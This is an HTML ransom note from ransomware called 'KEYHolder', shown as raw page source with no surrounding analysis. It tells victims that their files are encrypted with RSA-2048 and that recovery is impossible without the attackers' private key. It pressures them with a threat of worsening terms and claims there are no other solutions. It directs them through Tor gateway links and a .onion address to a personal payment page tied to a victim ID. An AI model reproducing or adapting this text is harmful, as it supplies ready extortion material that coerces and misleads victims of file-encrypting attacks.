<!doctype html>
<html>
	<head>
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
		<meta name="keywords" content="">
		<meta name="description" content="">
		<title>KEYHolder</title>
	</head>
	<body>
		<style type="text/css">
			body {
				margin: 0;
				padding-top:26px;
				font-size: 12px;
				background: #FFF;
			}
			body, input, select, textarea {
				font-family: serif;
			}
			ul, li, p, form, h1, h2, h3, h4, h5 {
				margin: 0; 
				padding: 0;
				font-weight: normal;
			}
			a {
				color: #3b614c;
			}
			h1 {
				color: #e33535;
				font-size: 20px;
				font-weight: bold;
				text-align: center;
				padding:10px 0;
			}
			#container {
				width: 900px;
				margin: 0 auto;
				padding:0 0 15px 0;
				background: #f9fdff;
				border: 4px solid #000000;
			}
			.content {
				padding: 0px 16px;
			}
			.content h5 {
				color: #e33535;
				font-size: 12px;
				margin:20px 0 6px 0;
				font-weight: bold;
			}
			.content .bold {
				color: #e33535;
				font-weight: bold;		
			}
			.content .block {
				padding: 0 0 3px 3px;
				margin-top: 16px;
			}
			.content .block h5{
				color: #e33535;
				font-size: 12px;
				font-weight: normal;
				padding: 6px 0 6px 0;
				margin: 0; 
				border-bottom:1px solid #bcb6b6;
			}
			.content .block p {
				color: #8b5555;
				margin-top:6px;
				font-weight: bold;
			}
			.content .block p span{
				color: #000;
				font-weight: normal;
			}
			.content .block a {
				line-height: 18px;
				font-weight: bold;
			}
		</style>
		<h1>KEYHolder</h1>
		<div id="container">
			<div class="content">
				<h5>What happened to your files ?</h5>
				<p>
					All of your files were protected by a strong encryption with RSA-2048 using <span class="bold">KEYHolder</span>.<br/>
					More information about the encryption keys using RSA-2048 can be found here: 
					<a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a>
				</p>
				<h5>What does this mean ?</h5>
				<p>
					This means that the structure and data within your files have been irrevocably changed, you will not be able to work <br/>
					with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.
				</p>
				<h5>How did this happen ?</h5>
				<p>
					Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br/>
					All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br/>
					Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
				</p>
				<h5>What do I do ?</h5>
				<p>
					Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br/>
					If you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.
				</p>
				<div class="block">
					<h5>For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:</h5>
					<p>
						1.<a href="https://mwyigd4n52mkbyhe.onion2web.com/00000003-DF7462D1">https://mwyigd4n52mkbyhe.onion2web.com/00000003-DF7462D1</a> <br/>
						2.<a href="https://mwyigd4n52mkbyhe.tor2web.org/00000003-DF7462D1">https://mwyigd4n52mkbyhe.tor2web.org/00000003-DF7462D1</a> <br/>
						3.<a href="https://mwyigd4n52mkbyhe.onion.to/00000003-DF7462D1">https://mwyigd4n52mkbyhe.onion.to/00000003-DF7462D1</a>
					</p>
				</div>
				<div class="block">
					<h5>If for some reasons the addresses are not available, follow these steps:</h5>
					<p>
						1.<span>Download and install tor-browser:</span> <a href="http://www.torproject.org/projects/torbrowser.html.en">http://www.torproject.org/projects/torbrowser.html.en</a><br/>
						2.<span>After a successful installation, run the browser and wait for initialization.</span><br/>
						3.<span>Type in the address bar: <strong>mwyigd4n52mkbyhe.onion/00000003-DF7462D1</strong></span><br/>
						4.<span>Follow the instructions on the site.</span>
					</p>
				</div>
				
				<div class="block">
					<h5>IMPORTANT INFORMATION:</h5>
					<p>
						<span>Your personal page: </span> <a href="https://mwyigd4n52mkbyhe.onion/00000003-DF7462D1">https://mwyigd4n52mkbyhe.onion/00000003-DF7462D1</a><br/>
						<span>Your personal identification number (if you open the site (or TOR 's) directly): <strong>00000003-DF7462D1</strong></span>
					</p>
				</div>
			</div>
		</div>
	</body>
</html>
